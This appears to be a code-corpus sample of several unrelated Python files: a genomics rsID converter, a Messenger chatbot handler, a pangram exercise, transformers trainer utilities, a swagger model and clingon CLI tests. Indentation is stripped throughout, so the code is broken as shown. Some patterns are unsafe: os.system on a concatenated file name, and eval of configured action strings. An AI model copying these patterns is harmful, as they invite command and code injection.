###########################
##### PARSE ARGUMENTS ####
###########################
def get_settings():
parser = argparse.ArgumentParser(description="Convert weights files with just rsIDs to ones with chromosomes and coordinates too\n")
parser.add_argument("-v","--vcf",help="bgzipped and tabixed vcf file",type=str,required=True)
parser.add_argument("-r","--rsidx",help="rsidx file",type=str)
parser.add_argument("-w","--weights",help="weights file. assumes one header. will skip lines with #",type=str,required=True)
parser.add_argument("-c","--col",help="0-based column in weights file that rsID is in",type=int,default=0)
parser.add_argument("-p","--prefix",help="Prefix for output file, including path",type=str,required=True)
args=parser.parse_args()
return args
###############################
######## SUB ROUTINES #########
###############################
def open_zip(f):
if ".gz" in f:
command=gzip.open(f,"rt")
print("Opening gzipped file %s\n" % f,file=sys.stderr)
elif f == "-":
command=sys.stdin()
else:
command=open(f,"rt")
print("Opening file %s\n" % f,file=sys.stderr)
return command
def index(vcf):
with sqlite3.connect('myidx.db') as dbconn, open(vcf, 'r') as vcffh:
rsidx.index.index(dbconn, vcffh)
# rsidx index 00-All.vcf.gz 00-All.vcf.rsidx
def search(rsidlist,vcf,index):
print("Querying markers from weights file in VCF\n",file=sys.stderr)
in_len=len(rsidlist)
rsid_dict={}
with sqlite3.connect(index) as dbconn:
for line in rsidx.search.search(rsidlist, dbconn, vcf):
ls=line.rstrip()
lineList=ls.split("\t")
rsid_dict[lineList[2]]=lineList[:5] #assumes VCF is chr, pos, rsID, REF, ALT
out_len=len(rsid_dict.keys())
if in_len!=out_len:
diff=int(in_len)-int(out_len)
print("Not all rsIDs from weights file could be found in the VCF. Missing %d of %d\n" % (diff,in_len),file=sys.stderr)
else:
print("All %d rsIDs from weights file could be found in the VCF.\n" % in_len,file=sys.stderr)
return rsid_dict
def rsid_from_weights(weights,col):
print("Getting rsIDs from weights file %s\n" %weights, file=sys.stderr)
command=open_zip(weights)
rsid_list=[]
header_count=0
with command as f:
for line in f:
ls=line.rstrip()
if ls[0] != "#":
if header_count==0: #skip first header after any lines with #
header_count+=1
next
else:
lineList=ls.split()
rsid_list.append(lineList[col])
return rsid_list
def merge(weights,col,rsid_dict,prefix):
command=open_zip(weights)
header_count=0
output=prefix + "_reformat.txt"
print("Writing new weights file %s\n" %output, file=sys.stderr)
with open(output,"w") as o:
with command as f:
for line in f:
ls=line.rstrip()
if ls[0] == "#":
o.write(ls+"\n")
elif header_count==0:
lineList=ls.split()
o.write("\t".join(lineList+["CHR","POS","REF","ALT"])+"\n") #write header
header_count+=1
else:
lineList=ls.split()
try:
from_vcf=rsid_dict[lineList[col]] #look up from dictionary from vcf
## handle occurence of multiple alt alleles by printing each potential entry as a newline
for alt_allele in from_vcf[4].split(","):
o.write("\t".join(lineList+from_vcf[0:2]+[from_vcf[3]]+[alt_allele])+"\n")
except KeyError:
o.write("\t".join(lineList+["NA"]*4)+"\n") #rsid not in VCF
f.close()
o.close()
os.system("gzip "+output) #ystem call to gzip
return 0
#########################
########## MAIN #########
#########################
def main():
#get arguments
args = get_settings()
print(args)
#github package https://github.com/bioforensics/rsidx
if not os.path.exists(args.vcf):
sys.exit("VCF does not exist\n")
if not os.path.exists(args.rsidx):
sys.exit("RSIDX does not exist\n")
#index(args.vcf)
#get rsids from weights file
rsid_list=rsid_from_weights(args.weights,args.col)
#search vcf
rsid_dict=search(rsid_list,args.vcf,args.rsidx)
#merge new info with weights file
merge(args.weights,args.col,rsid_dict,args.prefix)
#call main
if __name__ == "__main__":
main()
111
| StarcoderdataPython |
126311 | <gh_stars>1-10
from __future__ import absolute_import
from __future__ import print_function
import os
import json
import apiai
import requests
import base64
import sys
import random
import uuid
import time
from timeit import default_timer as timer
from flask import request
from actions import *
class FacebookHandler(object):
"""
The facebook handler acts as the interface to handle all requests coming
from messenger.
It parses the payload and responds
"""
def __init__(self, pid, pat, verify_token, ozz_guid, actions, redis_db, mongo, log):
self.pid = pid
self.pat = pat
self.verify_token = verify_token
self.ozz_guid = ozz_guid
self.redis_db = redis_db
self.mongo = mongo
self.log = log
with open(actions,"r") as jsonFile:
self.actions = json.load(jsonFile)
if ozz_guid != "":
if ozz_guid[:4] == 'api_':
self.api = apiai.ApiAI(ozz_guid[4:])
print("Messenger endpoint - /api/messages/facebook")
def verify(self,*args,**kwargs):
if request.args.get('hub.verify_token','') == self.verify_token:
return request.args.get('hub.challenge','')
else:
return "Error, wrong validation token"
def respond(self,*args,**kwargs):
payload = request.get_json()
for sender, message in self.messaging_events(payload):
if sender != self.pid:
if type(message) != str:
start = timer()
intent=None
entities=None
action=None
message = message.decode('utf-8')
r = requests.get("https://graph.facebook.com/v2.6/"+ sender + "?fields=first_name,last_name,profile_pic,locale,timezone,gender&access_token=" + self.pat)
r_data = json.loads(r.text)
session = {}
session['user'] = {
'id':sender,
'name':r_data['first_name'] + ' ' + r_data['last_name'],
'profile_pic':r_data['profile_pic'],
'locale':r_data['locale'],
'timezone':r_data['timezone'],
'gender':r_data['gender']
}
session['cache'] = self.redis_db
session['mongo'] = self.mongo
session['message'] = message
session['channel'] = 'facebook'
if self.api:
r = self.api.text_request()
r.session_id = uuid.uuid4().hex
r.query = message
res = r.getresponse()
res = json.loads(res.read().decode('utf-8'))
intent = res["result"]["action"]
if intent == '':
intent = res["result"]["metadata"]["intentName"]
response = res["result"]["fulfillment"]["speech"]
entities = res["result"]['parameters']
session['intent'] = intent
session['entities'] = entities
print(intent)
if intent in self.actions:
action = self.actions[intent]
if type(self.actions[intent]) == list:
response = random.choice(self.actions[intent])
self.send_message(self.pat,sender,response)
else:
func = eval(self.actions[intent])
func(session)
elif response != "":
end = timer()
runtime = str(end - start)
if self.mongo:
log_object = {"message":message,"channel":"facebook","intent":intent,"entities":entities,"action":action,"response":str(response),"runtime":runtime,"time":str(time.time())}
self.mongo.db.logs.insert_one(log_object)
self.send_message(self.pat, sender, response)
else:
end = timer()
runtime = str(end - start)
if self.mongo:
log_object = {"message":message,"channel":"facebook","intent":intent,"entities":entities,"action":action,"response":str(message),"runtime":runtime,"time":str(time.time())}
self.mongo.db.logs.insert_one(log_object)
self.send_message(self.pat, sender, message)
return "responded"
def messaging_events(self, payload):
data = payload
messaging_events = data["entry"][0]["messaging"]
for event in messaging_events:
if event["sender"]["id"] == self.pid:
continue
elif 'read' in event:
continue
elif 'delivery' in event:
continue
else:
if "message" in event and "text" in event["message"]:
yield event["sender"]["id"], event["message"]["text"].encode('unicode_escape')
elif "postback" in event and "payload" in event["postback"]:
yield event["sender"]["id"], event["postback"]["payload"].encode('unicode_escape')
def send_message(self, token, recipient, text):
"""Send the message text to recipient with id recipient.
"""
if sys.version_info >= (3, 0):
message = text
else:
message = text.decode('unicode_escape')
r = requests.post("https://graph.facebook.com/v2.6/me/messages",
params={"access_token": token},
data=json.dumps({
"recipient": {"id": recipient},
"message": {"text": message}
}),
headers={'Content-type': 'application/json'})
if r.status_code != requests.codes.ok:
print(r.text) | StarcoderdataPython |
1618666 | <reponame>object-oriented-human/competitive
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'pangrams' function below.
#
# The function is expected to return a STRING.
# The function accepts STRING s as parameter.
#
def pangrams(s):
alphabet = list("abcdefghijklmnopqrstuvwxyz")
s = s.lower()
pangram = True
for x in alphabet:
if x not in s:
pangram = False
if not pangram:
return "not pangram"
else:
return "pangram"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = pangrams(s)
fptr.write(result + '\n')
fptr.close()
| StarcoderdataPython |
3343903 | <filename>src/transformers/trainer_utils.py
import random
from typing import Any, Dict, List, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import is_tf_available, is_torch_available, is_torch_tpu_available
from .tokenization_utils_base import ExplicitEnum
if is_torch_available():
import torch
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf``
(if installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
import torch
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
import tensorflow as tf
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
PREFIX_CHECKPOINT_DIR = "checkpoint"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class BestRun(NamedTuple):
"""
The best run found by an hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
Parameters:
run_id (:obj:`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (:obj:`float`):
The objective that was obtained for this run.
hyperparameters (:obj:`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
The default objective to maximize/minimize when doing an hyperparameter search. It is the evaluation loss if no
metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
Args:
metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
:obj:`float`: The objective to minimize or maximize
"""
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_available
assert is_ray_available(), "This function needs ray installed: `pip install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
}
def nested_concat(tensors, new_tensors, dim=0):
"Concat the `new_tensors` to `tensors` on `dim`. Works for tensors or nested list/tuples of tensors."
if is_torch_available():
assert type(tensors) == type(
new_tensors
), f"Expected `tensors` and `new_tensors` to have the same type but found {type(tensors)} and {type(new_tensors)}."
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_concat(t, n, dim) for t, n in zip(tensors, new_tensors))
return torch.cat((tensors, new_tensors), dim=dim)
else:
raise ImportError("Torch must be installed to use `nested_concat`")
def nested_numpify(tensors):
"Numpify `tensors` (even if it's a nested list/tuple of tensors)."
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_numpify(t) for t in tensors)
return tensors.cpu().numpy()
def nested_detach(tensors):
"Detach `tensors` (even if it's a nested list/tuple of tensors)."
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_detach(t) for t in tensors)
return tensors.detach()
def nested_xla_mesh_reduce(tensors, name):
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_xla_mesh_reduce(t, f"{name}_{i}") for i, t in enumerate(tensors))
return xm.mesh_reduce(name, tensors, torch.cat)
else:
raise ImportError("Torch xla must be installed to use `nested_xla_mesh_reduce`")
def distributed_concat(tensor: "torch.Tensor", num_total_examples: Optional[int] = None) -> "torch.Tensor":
if is_torch_available():
try:
if isinstance(tensor, (tuple, list)):
return type(tensor)(distributed_concat(t, num_total_examples) for t in tensor)
output_tensors = [tensor.clone() for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather(output_tensors, tensor)
concat = torch.cat(output_tensors, dim=0)
# truncate the dummy elements added by SequentialDistributedSampler
if num_total_examples is not None:
concat = concat[:num_total_examples]
return concat
except AssertionError:
raise AssertionError("Not currently using distributed training")
else:
raise ImportError("Torch must be installed to use `distributed_concat`")
def distributed_broadcast_scalars(
scalars: List[Union[int, float]], num_total_examples: Optional[int] = None
) -> "torch.Tensor":
if is_torch_available():
try:
tensorized_scalar = torch.Tensor(scalars).cuda()
output_tensors = [tensorized_scalar.clone() for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather(output_tensors, tensorized_scalar)
concat = torch.cat(output_tensors, dim=0)
# truncate the dummy elements added by SequentialDistributedSampler
if num_total_examples is not None:
concat = concat[:num_total_examples]
return concat
except AssertionError:
raise AssertionError("Not currently using distributed training")
else:
raise ImportError("Torch must be installed to use `distributed_broadcast_scalars`")
| StarcoderdataPython |
4832937 | from common.sql.datetime import DateTime
from common.sql.uuid import UUID
from common.utils.datetime import get_current_datetime
from common.utils.uuid import generate_uuid4
from sqlalchemy import Column, Integer
from backend.sql.base import Base
class AccountDeltaGroup(Base):
__tablename__ = "AccountDeltaGroup"
uuid = Column(UUID, primary_key=True, default=generate_uuid4)
user_uuid = Column(UUID, nullable=False, index=True)
# pointer to the field in the challenge table
# the challenge incorporates the exchange request uuid, along with the nizks for each currency.
# it should be cryptographically constructed
challenge_uuid = Column(UUID, nullable=False)
status = Column(Integer, nullable=False) # TransactionStatus enum
# An AccountDeltas should be published in the audit only when the status is COMPLETED
audit_publish_version = Column(Integer)
add_to_audit_timestamp = Column(DateTime)
# Adding a timestamp for a stable list ordering
created_at = Column(DateTime, default=get_current_datetime, nullable=False)
| StarcoderdataPython |
189472 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetworkInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetworkInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'adv_state': 'str',
'cur_down_frame_size': 'int',
'cur_net_time': 'datetime',
'cur_sys_time': 'datetime',
'latency': 'int',
'lost_packet_count': 'int',
'net_queue_size': 'int',
'net_start_sys_time': 'datetime',
'num_motes': 'int',
'path_stability': 'float',
'reliability': 'float',
'reuse_mode': 'str',
'rx_packet_count': 'int',
'user_queue_size': 'int'
}
self.attribute_map = {
'adv_state': 'advState',
'cur_down_frame_size': 'curDownFrameSize',
'cur_net_time': 'curNetTime',
'cur_sys_time': 'curSysTime',
'latency': 'latency',
'lost_packet_count': 'lostPacketCount',
'net_queue_size': 'netQueueSize',
'net_start_sys_time': 'netStartSysTime',
'num_motes': 'numMotes',
'path_stability': 'pathStability',
'reliability': 'reliability',
'reuse_mode': 'reuseMode',
'rx_packet_count': 'rxPacketCount',
'user_queue_size': 'userQueueSize'
}
self._adv_state = None
self._cur_down_frame_size = None
self._cur_net_time = None
self._cur_sys_time = None
self._latency = None
self._lost_packet_count = None
self._net_queue_size = None
self._net_start_sys_time = None
self._num_motes = None
self._path_stability = None
self._reliability = None
self._reuse_mode = None
self._rx_packet_count = None
self._user_queue_size = None
@property
def adv_state(self):
"""
Gets the adv_state of this NetworkInfo.
State of network advertising
:return: The adv_state of this NetworkInfo.
:rtype: str
"""
return self._adv_state
@adv_state.setter
def adv_state(self, adv_state):
"""
Sets the adv_state of this NetworkInfo.
State of network advertising
:param adv_state: The adv_state of this NetworkInfo.
:type: str
"""
allowed_values = ["off", "on"]
if adv_state not in allowed_values:
raise ValueError(
"Invalid value for `adv_state`, must be one of {0}"
.format(allowed_values)
)
self._adv_state = adv_state
@property
def cur_down_frame_size(self):
"""
Gets the cur_down_frame_size of this NetworkInfo.
Current downstream frame size (in number of timeslots)
:return: The cur_down_frame_size of this NetworkInfo.
:rtype: int
"""
return self._cur_down_frame_size
@cur_down_frame_size.setter
def cur_down_frame_size(self, cur_down_frame_size):
"""
Sets the cur_down_frame_size of this NetworkInfo.
Current downstream frame size (in number of timeslots)
:param cur_down_frame_size: The cur_down_frame_size of this NetworkInfo.
:type: int
"""
self._cur_down_frame_size = cur_down_frame_size
@property
def cur_net_time(self):
"""
Gets the cur_net_time of this NetworkInfo.
Current network time
:return: The cur_net_time of this NetworkInfo.
:rtype: datetime
"""
return self._cur_net_time
@cur_net_time.setter
def cur_net_time(self, cur_net_time):
"""
Sets the cur_net_time of this NetworkInfo.
Current network time
:param cur_net_time: The cur_net_time of this NetworkInfo.
:type: datetime
"""
self._cur_net_time = cur_net_time
@property
def cur_sys_time(self):
"""
Gets the cur_sys_time of this NetworkInfo.
Current system time
:return: The cur_sys_time of this NetworkInfo.
:rtype: datetime
"""
return self._cur_sys_time
@cur_sys_time.setter
def cur_sys_time(self, cur_sys_time):
"""
Sets the cur_sys_time of this NetworkInfo.
Current system time
:param cur_sys_time: The cur_sys_time of this NetworkInfo.
:type: datetime
"""
self._cur_sys_time = cur_sys_time
@property
def latency(self):
"""
Gets the latency of this NetworkInfo.
Average network latency, in milliseconds*
:return: The latency of this NetworkInfo.
:rtype: int
"""
return self._latency
@latency.setter
def latency(self, latency):
"""
Sets the latency of this NetworkInfo.
Average network latency, in milliseconds*
:param latency: The latency of this NetworkInfo.
:type: int
"""
self._latency = latency
@property
def lost_packet_count(self):
"""
Gets the lost_packet_count of this NetworkInfo.
Number of lost packets accumulated over all motes*
:return: The lost_packet_count of this NetworkInfo.
:rtype: int
"""
return self._lost_packet_count
@lost_packet_count.setter
def lost_packet_count(self, lost_packet_count):
"""
Sets the lost_packet_count of this NetworkInfo.
Number of lost packets accumulated over all motes*
:param lost_packet_count: The lost_packet_count of this NetworkInfo.
:type: int
"""
self._lost_packet_count = lost_packet_count
@property
def net_queue_size(self):
"""
Gets the net_queue_size of this NetworkInfo.
Number of outstanding network management commands queued up to the network
:return: The net_queue_size of this NetworkInfo.
:rtype: int
"""
return self._net_queue_size
@net_queue_size.setter
def net_queue_size(self, net_queue_size):
"""
Sets the net_queue_size of this NetworkInfo.
Number of outstanding network management commands queued up to the network
:param net_queue_size: The net_queue_size of this NetworkInfo.
:type: int
"""
self._net_queue_size = net_queue_size
@property
def net_start_sys_time(self):
"""
Gets the net_start_sys_time of this NetworkInfo.
Time at which the first AP mote joined the manager, in ISO-8601 format. This value is reset every time the number of connected AP motes goes from zero to one
:return: The net_start_sys_time of this NetworkInfo.
:rtype: datetime
"""
return self._net_start_sys_time
@net_start_sys_time.setter
def net_start_sys_time(self, net_start_sys_time):
"""
Sets the net_start_sys_time of this NetworkInfo.
Time at which the first AP mote joined the manager, in ISO-8601 format. This value is reset every time the number of connected AP motes goes from zero to one
:param net_start_sys_time: The net_start_sys_time of this NetworkInfo.
:type: datetime
"""
self._net_start_sys_time = net_start_sys_time
@property
def num_motes(self):
"""
Gets the num_motes of this NetworkInfo.
Number of motes in the network
:return: The num_motes of this NetworkInfo.
:rtype: int
"""
return self._num_motes
@num_motes.setter
def num_motes(self, num_motes):
"""
Sets the num_motes of this NetworkInfo.
Number of motes in the network
:param num_motes: The num_motes of this NetworkInfo.
:type: int
"""
self._num_motes = num_motes
@property
def path_stability(self):
"""
Gets the path_stability of this NetworkInfo.
Accumulated path stability, % of unicast packets that were transmitted and resulted in a correctly received ACK at the MAC layer. A negative value means not enough data has been collected.*
:return: The path_stability of this NetworkInfo.
:rtype: float
"""
return self._path_stability
@path_stability.setter
def path_stability(self, path_stability):
"""
Sets the path_stability of this NetworkInfo.
Accumulated path stability, % of unicast packets that were transmitted and resulted in a correctly received ACK at the MAC layer. A negative value means not enough data has been collected.*
:param path_stability: The path_stability of this NetworkInfo.
:type: float
"""
self._path_stability = path_stability
@property
def reliability(self):
"""
Gets the reliability of this NetworkInfo.
Accumulated network reliability, % of packets received from all motes. A negative value means not enough data has been collected.*
:return: The reliability of this NetworkInfo.
:rtype: float
"""
return self._reliability
@reliability.setter
def reliability(self, reliability):
"""
Sets the reliability of this NetworkInfo.
Accumulated network reliability, % of packets received from all motes. A negative value means not enough data has been collected.*
:param reliability: The reliability of this NetworkInfo.
:type: float
"""
self._reliability = reliability
@property
def reuse_mode(self):
"""
Gets the reuse_mode of this NetworkInfo.
Cell space reuse mode
:return: The reuse_mode of this NetworkInfo.
:rtype: str
"""
return self._reuse_mode
@reuse_mode.setter
def reuse_mode(self, reuse_mode):
"""
Sets the reuse_mode of this NetworkInfo.
Cell space reuse mode
:param reuse_mode: The reuse_mode of this NetworkInfo.
:type: str
"""
allowed_values = ["N/A", "none", "upstream", "all"]
if reuse_mode not in allowed_values:
raise ValueError(
"Invalid value for `reuse_mode`, must be one of {0}"
.format(allowed_values)
)
self._reuse_mode = reuse_mode
@property
def rx_packet_count(self):
"""
Gets the rx_packet_count of this NetworkInfo.
Number of packets received accumulated over all motes*
:return: The rx_packet_count of this NetworkInfo.
:rtype: int
"""
return self._rx_packet_count
@rx_packet_count.setter
def rx_packet_count(self, rx_packet_count):
"""
Sets the rx_packet_count of this NetworkInfo.
Number of packets received accumulated over all motes*
:param rx_packet_count: The rx_packet_count of this NetworkInfo.
:type: int
"""
self._rx_packet_count = rx_packet_count
@property
def user_queue_size(self):
"""
Gets the user_queue_size of this NetworkInfo.
Number of user packets in the queue
:return: The user_queue_size of this NetworkInfo.
:rtype: int
"""
return self._user_queue_size
@user_queue_size.setter
def user_queue_size(self, user_queue_size):
"""
Sets the user_queue_size of this NetworkInfo.
Number of user packets in the queue
:param user_queue_size: The user_queue_size of this NetworkInfo.
:type: int
"""
self._user_queue_size = user_queue_size
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| StarcoderdataPython |
1627170 | <reponame>francois-vincent/clingon<filename>tests/test_clingon.py
# -*- coding: utf-8 -*-
from __future__ import print_function
import mock
try:
# for py26
import unittest2 as unittest
except ImportError:
import unittest
try:
from collections import OrderedDict
except ImportError:
# for py26
from ordereddict import OrderedDict
from . import captured_output
from clingon import clingon
# this is to force decorator to delay execution of decorated function
clingon.DELAY_EXECUTION = True
clingon.DEBUG = False
test_version = '0.3.1'
# ---------- here are decorated functions under test -------------
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@clingon.clize
def clized_default_shorts(p1, p2,
first_option='default_value',
second_option=5,
third_option=[4, 3],
last_option=False):
"""Help docstring
"""
print('%s %s %s %s %s %s' % (p1, p2, first_option, second_option, third_option, last_option))
@clingon.clize(first_option='1', second_option=('2', 's', 'so'))
def clized_spec_shorts(p1, p2,
first_option='default_value',
second_option=5,
third_option=[4, 3],
last_option=False):
if last_option:
return 12
print('%s %s %s %s %s %s' % (p1, p2, first_option, second_option, third_option, last_option))
@clingon.clize
def clized_that_raises():
raise RuntimeError('I just raise')
@clingon.clize
def clized_varargs(p1, p2,
option='default_value',
*varargs):
print('%s %s %s %s' % (p1, p2, option, varargs))
def version():
return '1.2.3'
@clingon.clize
@clingon.set_variables(VERSION=version, message="you can dynamically customize help message !")
def clized_variables(p1, p2, long_name_option='default_value'):
"""Help docstring v{VERSION}
{message}
"""
pass
@clingon.clize
@clingon.set_variables(VERSION='1.2.3', message="you can dynamically customize help message !")
def clized_variables_one_short(p1, p2, option='default_value'):
"""Help docstring v{VERSION}
{message}
"""
pass
# ---------- end of decorated functions under test --------------
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class TestDecoratorBasic(unittest.TestCase):
def test_version(self):
self.assertEqual(clingon.__version__, test_version)
import clingon as cli
self.assertEqual(cli.__version__, test_version)
def test_decorator_multiple_args(self):
with self.assertRaises(ValueError) as cm:
clingon.clize(1, 2)
message = cm.exception.args[0]
self.assertEqual(message, "This decorator is for a function only")
def test_decorator_args_not_function(self):
with self.assertRaises(ValueError) as cm:
clingon.clize(1)
message = cm.exception.args[0]
self.assertEqual(message, "This decorator is for a function only")
def test_decorator_kwargs_not_sequence(self):
with self.assertRaises(ValueError) as cm:
clingon.clize(toto=1)
message = cm.exception.args[0]
self.assertEqual(message, "Decorator's keyword 'toto' value must be "
"a string or a tuple of strings, found: 1")
def test_kwargs(self):
def clized(*varargs, **keywargs):
pass
with self.assertRaises(TypeError) as cm:
clingon.clize(clized)
message = cm.exception.args[0]
self.assertEqual(message, "Keywords parameter '**keywargs' is not allowed")
def test_bad_spec_option(self):
def clized(option='default_value'):
pass
with self.assertRaises(ValueError) as cm:
clingon.clize(bad_option='')(clized)
message = cm.exception.args[0]
self.assertEqual(message, "This option does not exists so can't be given an alias: bad_option")
def test_internal_data(self):
def clized(p1, p2,
first_option='default_value',
second_option=5,
third_option=[4, 3],
last_option=False,
*varargs):
"""docstring"""
pass
ret = clingon.clize(clized)
self.assertEqual(ret.func.__name__, 'clized')
self.assertEqual(ret.docstring, "docstring")
self.assertEqual(ret.reqargs, ['p1', 'p2'])
self.assertEqual(ret.varargs, 'varargs')
self.assertDictEqual(ret.options, {
'--first-option': 'default_value',
'-f': 'default_value',
'--second-option': 5,
'-s': 5,
'--third-option': [4, 3],
'-t': [4, 3],
'--last-option': False,
'-l': False,
})
self.assertDictEqual(ret._options, {
'--first-option': 'default_value',
'--second-option': 5,
'--third-option': [4, 3],
'--last-option': False,
})
self.assertDictEqual(ret.options_aliases, {
'first_option': ['f'],
'second_option': ['s'],
'third_option': ['t'],
'last_option': ['l']
})
self.assertDictEqual(ret.options_equ, {
'--first-option': 'first_option',
'-f': 'first_option',
'--second-option': 'second_option',
'-s': 'second_option',
'--third-option': 'third_option',
'-t': 'third_option',
'--last-option': 'last_option',
'-l': 'last_option'
})
self.assertEqual(ret.python_options,
OrderedDict([
('first_option', 'default_value'),
('second_option', 5),
('third_option', [4, 3]),
('last_option', False)
]))
def test_options_same_first_letter(self):
def clized(option_1=False,
option_2=5):
pass
ret = clingon.clize(clized)
self.assertDictEqual(ret.options, {
'--option-1': False,
'-o': False,
'--option-2': 5,
})
self.assertDictEqual(ret.options_aliases, {
'option_1': ['o'],
'option_2': [],
})
self.assertDictEqual(ret.options_equ, {
'--option-1': 'option_1',
'-o': 'option_1',
'--option-2': 'option_2',
})
@mock.patch('sys.exit')
class TestDecorator(unittest.TestCase):
def test_default_no_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2')
self.assertEqual(out.getvalue(),
"p1 p2 default_value 5 [4, 3] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_first_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --first-option specific_value')
self.assertEqual(out.getvalue(),
"p1 p2 specific_value 5 [4, 3] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_second_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --second-option 10')
self.assertEqual(out.getvalue(),
"p1 p2 default_value 10 [4, 3] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_third_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --third-option 16 9')
self.assertEqual(out.getvalue(),
"p1 p2 default_value 5 [16, 9] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_last_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --last-option')
self.assertEqual(out.getvalue(),
"p1 p2 default_value 5 [4, 3] True\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_all_options(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts(
'p1 p2 --third-option 16 9 --second-option 10 --first-option specific_value --last-option')
self.assertEqual(out.getvalue(),
"p1 p2 specific_value 10 [16, 9] True\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_default_all_options_short(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 -t 16 9 -s 10 -f specific_value -l')
self.assertEqual(out.getvalue(),
"p1 p2 specific_value 10 [16, 9] True\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_option_bad_type(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --second-option x')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Argument of option --second-option has wrong type (<int> expected)\n")
